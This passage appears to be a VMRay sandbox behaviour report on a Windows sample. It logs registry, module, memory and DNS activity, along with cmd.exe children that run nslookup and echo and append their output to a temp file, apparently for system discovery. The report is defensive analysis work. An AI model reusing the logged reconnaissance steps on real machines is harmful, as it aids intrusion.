Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor value_name = PathCompletionChar, data = 64, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor value_name = AutoRun, data = 64, type = REG_NONE False 1
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Command Processor value_name = DisableUNCCheck, data = 64, type = REG_NONE False 1
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Command Processor value_name = EnableExtensions, data = 1, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Command Processor value_name = DelayedExpansion, data = 1, type = REG_NONE False 1
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Command Processor value_name = DefaultColor, data = 0, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Command Processor value_name = CompletionChar, data = 9, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Command Processor value_name = PathCompletionChar, data = 9, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Command Processor value_name = AutoRun, data = 9, type = REG_NONE False 1
Fn
Module (8)
»
Operation Module Additional Information Success Count Logfile
Get Handle c:\windows\system32\cmd.exe base_address = 0x7ff60d9c0000 True 1
Fn
Get Handle c:\windows\system32\kernel32.dll base_address = 0x7ff977ab0000 True 2
Fn
Get Filename - process_name = c:\windows\system32\cmd.exe, file_name_orig = C:\Windows\system32\cmd.exe, size = 260 True 1
Fn
Get Address c:\windows\system32\kernel32.dll function = SetThreadUILanguage, address_out = 0x7ff977acd550 True 1
Fn
Get Address c:\windows\system32\kernel32.dll function = CopyFileExW, address_out = 0x7ff977ad25e0 True 1
Fn
Get Address c:\windows\system32\kernel32.dll function = IsDebuggerPresent, address_out = 0x7ff977ad1f90 True 1
Fn
Get Address c:\windows\system32\kernel32.dll function = SetConsoleInputExeNameW, address_out = 0x7ff975423a10 True 1
Fn
Environment (11)
»
Operation Additional Information Success Count Logfile
Get Environment String - True 4
Fn
Data
Get Environment String name = PATH, result_out = C:\ProgramData\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\ True 1
Fn
Get Environment String name = PATHEXT, result_out = .COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC True 1
Fn
Get Environment String name = PROMPT False 1
Fn
Get Environment String name = COMSPEC, result_out = C:\Windows\system32\cmd.exe True 1
Fn
Get Environment String name = KEYS False 1
Fn
Set Environment String name = PROMPT, value = $P$G True 1
Fn
Set Environment String name = =C:, value = C:\Windows\System32 True 1
Fn
Process #31: cmd.exe
67 0
»
Information Value
ID #31
File Name c:\windows\system32\cmd.exe
Command Line cmd /C "nslookup 127.0.0.1 >> C:\Users\CIIHMN~1\AppData\Local\Temp\19E9.bin1"
Initial Working Directory C:\Windows\system32\
Monitor Start Time: 00:04:36, Reason: Child Process
Unmonitor End Time: 00:04:37, Reason: Terminated by Timeout
Monitor Duration 00:00:01
OS Process Information
»
Information Value
PID 0x420
Parent PID 0x834 (c:\windows\explorer.exe)
Is Created or Modified Executable False
Integrity Level Medium
Username LHNIWSJ\CIiHmnxMn6Ps
Enabled Privileges SeChangeNotifyPrivilege
Thread IDs
0x 3A0
0x AF8
Region
»
Name Start VA End VA Type Permissions Monitored Dumped YARA Actions
private_0x000000007ffe0000 0x7ffe0000 0x7ffeffff Private Memory r True False False -
private_0x000000a1b5800000 0xa1b5800000 0xa1b581ffff Private Memory rw True False False -
pagefile_0x000000a1b5800000 0xa1b5800000 0xa1b580ffff Pagefile Backed Memory rw True False False -
private_0x000000a1b5810000 0xa1b5810000 0xa1b5816fff Private Memory rw True False False -
pagefile_0x000000a1b5820000 0xa1b5820000 0xa1b5833fff Pagefile Backed Memory r True False False -
private_0x000000a1b5840000 0xa1b5840000 0xa1b593ffff Private Memory rw True False False -
pagefile_0x000000a1b5940000 0xa1b5940000 0xa1b5943fff Pagefile Backed Memory r True False False -
pagefile_0x000000a1b5950000 0xa1b5950000 0xa1b5950fff Pagefile Backed Memory r True False False -
private_0x000000a1b5960000 0xa1b5960000 0xa1b5961fff Private Memory rw True False False -
locale.nls 0xa1b5970000 0xa1b5a2dfff Memory Mapped File r False False False -
private_0x000000a1b5a30000 0xa1b5a30000 0xa1b5a36fff Private Memory rw True False False -
private_0x000000a1b5aa0000 0xa1b5aa0000 0xa1b5b9ffff Private Memory rw True False False -
private_0x000000a1b5ba0000 0xa1b5ba0000 0xa1b5c9ffff Private Memory rw True False False -
private_0x000000a1b5df0000 0xa1b5df0000 0xa1b5dfffff Private Memory rw True False False -
sortdefault.nls 0xa1b5e00000 0xa1b6136fff Memory Mapped File r False False False -
pagefile_0x00007df5ff0b0000 0x7df5ff0b0000 0x7ff5ff0affff Pagefile Backed Memory - True False False -
pagefile_0x00007ff60d6d0000 0x7ff60d6d0000 0x7ff60d7cffff Pagefile Backed Memory r True False False -
pagefile_0x00007ff60d7d0000 0x7ff60d7d0000 0x7ff60d7f2fff Pagefile Backed Memory r True False False -
private_0x00007ff60d7fa000 0x7ff60d7fa000 0x7ff60d7fbfff Private Memory rw True False False -
private_0x00007ff60d7fc000 0x7ff60d7fc000 0x7ff60d7fdfff Private Memory rw True False False -
private_0x00007ff60d7fe000 0x7ff60d7fe000 0x7ff60d7fefff Private Memory rw True False False -
cmd.exe 0x7ff60d9c0000 0x7ff60da18fff Memory Mapped File rwx True False False -
kernelbase.dll 0x7ff9753d0000 0x7ff9755acfff Memory Mapped File rwx False False False -
msvcrt.dll 0x7ff9773c0000 0x7ff97745cfff Memory Mapped File rwx False False False -
kernel32.dll 0x7ff977ab0000 0x7ff977b5cfff Memory Mapped File rwx False False False -
ntdll.dll 0x7ff977f30000 0x7ff9780f1fff Memory Mapped File rwx False False False -
Host Behavior
File (20)
»
Operation Filename Additional Information Success Count Logfile
Create C:\Users\CIIHMN~1\AppData\Local\Temp\19E9.bin1 desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Get Info C:\Windows\system32 type = file_attributes True 1
Fn
Get Info C:\Windows\System32 type = file_attributes True 1
Fn
Get Info STD_OUTPUT_HANDLE type = file_type True 1
Fn
Get Info STD_OUTPUT_HANDLE type = file_type True 1
Fn
Get Info STD_OUTPUT_HANDLE type = size True 1
Fn
Open STD_OUTPUT_HANDLE - True 10
Fn
Open STD_INPUT_HANDLE - True 3
Fn
Read STD_OUTPUT_HANDLE size = 1, size_out = 1 True 1
Fn
Data
Registry (17)
»
Operation Key Additional Information Success Count Logfile
Open Key HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\System - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor - True 1
Fn
Open Key HKEY_CURRENT_USER\Software\Microsoft\Command Processor - True 1
Fn
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor value_name = DisableUNCCheck, data = 1, type = REG_NONE False 1
Fn
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor value_name = EnableExtensions, data = 1, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor value_name = DelayedExpansion, data = 1, type = REG_NONE False 1
Fn
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor value_name = DefaultColor, data = 0, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor value_name = CompletionChar, data = 64, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor value_name = PathCompletionChar, data = 64, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor value_name = AutoRun, data = 64, type = REG_NONE False 1
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Command Processor value_name = DisableUNCCheck, data = 64, type = REG_NONE False 1
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Command Processor value_name = EnableExtensions, data = 1, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Command Processor value_name = DelayedExpansion, data = 1, type = REG_NONE False 1
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Command Processor value_name = DefaultColor, data = 0, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Command Processor value_name = CompletionChar, data = 9, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Command Processor value_name = PathCompletionChar, data = 9, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Command Processor value_name = AutoRun, data = 9, type = REG_NONE False 1
Fn
Process (1)
»
Operation Process Additional Information Success Count Logfile
Create C:\Windows\system32\nslookup.exe os_pid = 0x114, creation_flags = CREATE_EXTENDED_STARTUPINFO_PRESENT, show_window = SW_SHOWNORMAL True 1
Fn
Module (8)
»
Operation Module Additional Information Success Count Logfile
Get Handle c:\windows\system32\cmd.exe base_address = 0x7ff60d9c0000 True 1
Fn
Get Handle c:\windows\system32\kernel32.dll base_address = 0x7ff977ab0000 True 2
Fn
Get Filename - process_name = c:\windows\system32\cmd.exe, file_name_orig = C:\Windows\system32\cmd.exe, size = 260 True 1
Fn
Get Address c:\windows\system32\kernel32.dll function = SetThreadUILanguage, address_out = 0x7ff977acd550 True 1
Fn
Get Address c:\windows\system32\kernel32.dll function = CopyFileExW, address_out = 0x7ff977ad25e0 True 1
Fn
Get Address c:\windows\system32\kernel32.dll function = IsDebuggerPresent, address_out = 0x7ff977ad1f90 True 1
Fn
Get Address c:\windows\system32\kernel32.dll function = SetConsoleInputExeNameW, address_out = 0x7ff975423a10 True 1
Fn
Environment (19)
»
Operation Additional Information Success Count Logfile
Get Environment String - True 7
Fn
Data
Get Environment String name = PATH, result_out = C:\ProgramData\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\ True 2
Fn
Get Environment String name = PATHEXT, result_out = .COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC True 2
Fn
Get Environment String name = PROMPT False 1
Fn
Get Environment String name = COMSPEC, result_out = C:\Windows\system32\cmd.exe True 1
Fn
Get Environment String name = KEYS False 1
Fn
Set Environment String name = PROMPT, value = $P$G True 1
Fn
Set Environment String name = =C:, value = C:\Windows\System32 True 1
Fn
Set Environment String name = COPYCMD True 1
Fn
Set Environment String name = =ExitCode, value = 00000000 True 1
Fn
Set Environment String name = =ExitCodeAscii True 1
Fn
Process #33: nslookup.exe
8 11
»
Information Value
ID #33
File Name c:\windows\system32\nslookup.exe
Command Line nslookup 127.0.0.1
Initial Working Directory C:\Windows\system32\
Monitor Start Time: 00:04:36, Reason: Child Process
Unmonitor End Time: 00:04:37, Reason: Terminated by Timeout
Monitor Duration 00:00:01
OS Process Information
»
Information Value
PID 0x114
Parent PID 0x420 (c:\windows\system32\cmd.exe)
Is Created or Modified Executable False
Integrity Level Medium
Username LHNIWSJ\CIiHmnxMn6Ps
Enabled Privileges SeChangeNotifyPrivilege
Thread IDs
0x 510
0x 794
0x 954
Region
»
Name Start VA End VA Type Permissions Monitored Dumped YARA Actions
private_0x000000007ffe0000 0x7ffe0000 0x7ffeffff Private Memory r True False False -
private_0x000000ee681f0000 0xee681f0000 0xee6820ffff Private Memory rw True False False -
pagefile_0x000000ee681f0000 0xee681f0000 0xee681fffff Pagefile Backed Memory rw True False False -
private_0x000000ee68200000 0xee68200000 0xee68206fff Private Memory rw True False False -
pagefile_0x000000ee68210000 0xee68210000 0xee68223fff Pagefile Backed Memory r True False False -
private_0x000000ee68230000 0xee68230000 0xee682affff Private Memory rw True False False -
pagefile_0x000000ee682b0000 0xee682b0000 0xee682b3fff Pagefile Backed Memory r True False False -
pagefile_0x000000ee682c0000 0xee682c0000 0xee682c0fff Pagefile Backed Memory r True False False -
private_0x000000ee682d0000 0xee682d0000 0xee682d1fff Private Memory rw True False False -
locale.nls 0xee682e0000 0xee6839dfff Memory Mapped File r False False False -
private_0x000000ee683a0000 0xee683a0000 0xee6841ffff Private Memory rw True False False -
private_0x000000ee68420000 0xee68420000 0xee68426fff Private Memory rw True False False -
imm32.dll 0xee68430000 0xee68463fff Memory Mapped File r False False False -
nslookup.exe.mui 0xee68430000 0xee68434fff Memory Mapped File r False False False -
private_0x000000ee68440000 0xee68440000 0xee68440fff Private Memory rw True False False -
private_0x000000ee68450000 0xee68450000 0xee68450fff Private Memory rw True False False -
private_0x000000ee68470000 0xee68470000 0xee6856ffff Private Memory rw True False False -
private_0x000000ee68630000 0xee68630000 0xee6863ffff Private Memory rw True False False -
pagefile_0x000000ee68640000 0xee68640000 0xee687c7fff Pagefile Backed Memory r True False False -
pagefile_0x000000ee687d0000 0xee687d0000 0xee68950fff Pagefile Backed Memory r True False False -
pagefile_0x000000ee68960000 0xee68960000 0xee69d5ffff Pagefile Backed Memory r True False False -
pagefile_0x00007df5ffed0000 0x7df5ffed0000 0x7ff5ffecffff Pagefile Backed Memory - True False False -
pagefile_0x00007ff61dfe0000 0x7ff61dfe0000 0x7ff61e0dffff Pagefile Backed Memory r True False False -
pagefile_0x00007ff61e0e0000 0x7ff61e0e0000 0x7ff61e102fff Pagefile Backed Memory r True False False -
private_0x00007ff61e10b000 0x7ff61e10b000 0x7ff61e10cfff Private Memory rw True False False -
private_0x00007ff61e10d000 0x7ff61e10d000 0x7ff61e10efff Private Memory rw True False False -
private_0x00007ff61e10f000 0x7ff61e10f000 0x7ff61e10ffff Private Memory rw True False False -
nslookup.exe 0x7ff61e670000 0x7ff61e68afff Memory Mapped File rwx True False False -
napinsp.dll 0x7ff96aec0000 0x7ff96aed4fff Memory Mapped File rwx False False False -
pnrpnsp.dll 0x7ff96b3a0000 0x7ff96b3b9fff Memory Mapped File rwx False False False -
winrnr.dll 0x7ff96c110000 0x7ff96c11cfff Memory Mapped File rwx False False False -
dhcpcsvc.dll 0x7ff96f5b0000 0x7ff96f5c9fff Memory Mapped File rwx False False False -
dhcpcsvc6.dll 0x7ff96f5d0000 0x7ff96f5e5fff Memory Mapped File rwx False False False -
winnsi.dll 0x7ff971f40000 0x7ff971f4afff Memory Mapped File rwx False False False -
iphlpapi.dll 0x7ff971f50000 0x7ff971f87fff Memory Mapped File rwx False False False -
nlaapi.dll 0x7ff9727e0000 0x7ff9727f7fff Memory Mapped File rwx False False False -
dnsapi.dll 0x7ff973f10000 0x7ff973fb7fff Memory Mapped File rwx False False False -
mswsock.dll 0x7ff974170000 0x7ff9741ccfff Memory Mapped File rwx False False False -
kernelbase.dll 0x7ff9753d0000 0x7ff9755acfff Memory Mapped File rwx False False False -
user32.dll 0x7ff9757b0000 0x7ff9758fdfff Memory Mapped File rwx False False False -
nsi.dll 0x7ff976f70000 0x7ff976f77fff Memory Mapped File rwx False False False -
msctf.dll 0x7ff977200000 0x7ff97735bfff Memory Mapped File rwx False False False -
msvcrt.dll 0x7ff9773c0000 0x7ff97745cfff Memory Mapped File rwx False False False -
gdi32.dll 0x7ff9774c0000 0x7ff977644fff Memory Mapped File rwx False False False -
sechost.dll 0x7ff9776c0000 0x7ff97771afff Memory Mapped File rwx False False False -
imm32.dll 0x7ff977720000 0x7ff977755fff Memory Mapped File rwx False False False -
kernel32.dll 0x7ff977ab0000 0x7ff977b5cfff Memory Mapped File rwx False False False -
ws2_32.dll 0x7ff977cb0000 0x7ff977d18fff Memory Mapped File rwx False False False -
rpcrt4.dll 0x7ff977df0000 0x7ff977f15fff Memory Mapped File rwx False False False -
ntdll.dll 0x7ff977f30000 0x7ff9780f1fff Memory Mapped File rwx False False False -
Host Behavior
Registry (7)
»
Operation Key Additional Information Success Count Logfile
Open Key HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\Tcpip\Parameters - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\DNSClient - False 1
Fn
Read Value HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\Tcpip\Parameters value_name = DNSLookupOrder False 1
Fn
Read Value HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\Tcpip\Parameters value_name = Domain True 1
Fn
Read Value HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\Tcpip\Parameters value_name = DhcpDomain False 1
Fn
Read Value HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\Tcpip\Parameters value_name = SearchList False 1
Fn
Read Value HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\Tcpip\Parameters value_name = DhcpSearchList False 1
Fn
Module (1)
»
Operation Module Additional Information Success Count Logfile
Get Handle c:\windows\system32\nslookup.exe base_address = 0x7ff61e670000 True 1
Fn
Network Behavior
DNS (1)
»
Operation Additional Information Success Count Logfile
Get Hostname name_out = LHnIwsj True 1
Fn
UDP Sessions (2)
»
Information Value
Total Data Sent 82 bytes
Total Data Received 105 bytes
Contacted Host Count 1
Contacted Hosts 192.168.0.1:53
UDP Session #1
»
Information Value
Handle 0x148
Address Family AF_INET
Type SOCK_DGRAM
Protocol IPPROTO_IP
Remote Address 192.168.0.1
Remote Port 53
Local Address 0.0.0.0
Local Port 54873
Data Sent 42 bytes
Data Received 42 bytes
Operation Additional Information Success Count Logfile
Create protocol = IPPROTO_IP, address_family = AF_INET, type = SOCK_DGRAM True 1
Fn
Connect remote_address = 192.168.0.1, remote_port = 53 True 1
Fn
Send flags = NO_FLAG_SET, size = 42, size_out = 42 True 1
Fn
Data
Receive flags = NO_FLAG_SET, size = 65536, size_out = 42 True 1
Fn
Data
Close type = SOCK_DGRAM True 1
Fn
UDP Session #2
»
Information Value
Handle 0x148
Address Family AF_INET
Type SOCK_DGRAM
Protocol IPPROTO_IP
Remote Address 192.168.0.1
Remote Port 53
Local Address 0.0.0.0
Local Port 54873
Data Sent 40 bytes
Data Received 63 bytes
Operation Additional Information Success Count Logfile
Create protocol = IPPROTO_IP, address_family = AF_INET, type = SOCK_DGRAM True 1
Fn
Connect remote_address = 192.168.0.1, remote_port = 53 True 1
Fn
Send flags = NO_FLAG_SET, size = 40, size_out = 40 True 1
Fn
Data
Receive flags = NO_FLAG_SET, size = 65536, size_out = 63 True 1
Fn
Data
Close type = SOCK_DGRAM True 1
Fn
Process #34: cmd.exe
0 0
»
Information Value
ID #34
File Name c:\windows\system32\cmd.exe
Command Line cmd /C "echo -------- >> C:\Users\CIIHMN~1\AppData\Local\Temp\19E9.bin1"
Initial Working Directory C:\Windows\system32\
Monitor Start Time: 00:04:36, Reason: Child Process
Unmonitor End Time: 00:04:37, Reason: Terminated by Timeout
Monitor Duration 00:00:01
Remark No high level activity detected in monitored regions
OS Process Information
»
Information Value
PID 0xa1c
Parent PID 0x834 (c:\windows\explorer.exe)
Is Created or Modified Executable False
Integrity Level Medium
Username LHNIWSJ\CIiHmnxMn6Ps
Enabled Privileges SeChangeNotifyPrivilege
Thread IDs
0x BB0
Region
»
Name Start VA End VA Type Permissions Monitored Dumped YARA Actions
private_0x000000007ffe0000 0x7ffe0000 0x7ffeffff Private Memory r True False False -
private_0x00000004be240000 0x4be240000 0x4be25ffff Private Memory rw True False False -
pagefile_0x00000004be260000 0x4be260000 0x4be273fff Pagefile Backed Memory r True False False -
private_0x00000004be280000 0x4be280000 0x4be37ffff Private Memory rw True False False -
pagefile_0x00000004be380000 0x4be380000 0x4be383fff Pagefile Backed Memory r True False False -
pagefile_0x00000004be390000 0x4be390000 0x4be390fff Pagefile Backed Memory r True False False -
private_0x00000004be3a0000 0x4be3a0000 0x4be3a1fff Private Memory rw True False False -
private_0x00000004be560000 0x4be560000 0x4be65ffff Private Memory rw True False False -
pagefile_0x00007df5ffaa0000 0x7df5ffaa0000 0x7ff5ffa9ffff Pagefile Backed Memory - True False False -
pagefile_0x00007ff60cef0000 0x7ff60cef0000 0x7ff60cf12fff Pagefile Backed Memory r True False False -
private_0x00007ff60cf1d000 0x7ff60cf1d000 0x7ff60cf1efff Private Memory rw True False False -
private_0x00007ff60cf1f000 0x7ff60cf1f000 0x7ff60cf1ffff Private Memory rw True False False -
cmd.exe 0x7ff60d9c0000 0x7ff60da18fff Memory Mapped File rwx True False False -
kernelbase.dll 0x7ff9753d0000 0x7ff9755acfff Memory Mapped File rwx False False False -
kernel32.dll 0x7ff977ab0000 0x7ff977b5cfff Memory Mapped File rwx False False False -
ntdll.dll 0x7ff977f30000 0x7ff9780f1fff Memory Mapped File rwx False False False -
Function Logfile
Download-Icon
Exit-Icon

This feature requires an online-connection to the VMRay backend.

An offline version with limited functionality is also provided.
The offline version is supported only in Mozilla Firefoxwith deactivated setting "security.fileuri.strict_origin_policy". 


    

   

   

    Before
   

   

    

     

      
       This feature requires an online-connection to the VMRay backend.
      
      

      

      An offline version with limited functionality is also provided.
      

      The offline version is supported only in Mozilla Firefoxwith deactivated setting "security.fileuri.strict_origin_policy".
     

     

    

   

   

    After
   

   

    

     

      
       This feature requires an online-connection to the VMRay backend.
      
      

      

      An offline version with limited functionality is also provided.
      

      The offline version is supported only in Mozilla Firefoxwith deactivated setting "security.fileuri.strict_origin_policy".
     

     

    

   

   

    

     
      

       
       
       
       
      

     
     
     
    

   

  

  

   

    
    

     Screenshot
    

    

     Expand-Icon
    

    

     Exit-Icon
    

   

   

    

     icon_left
    

    

     icon_left
    

   

   

   

   

    image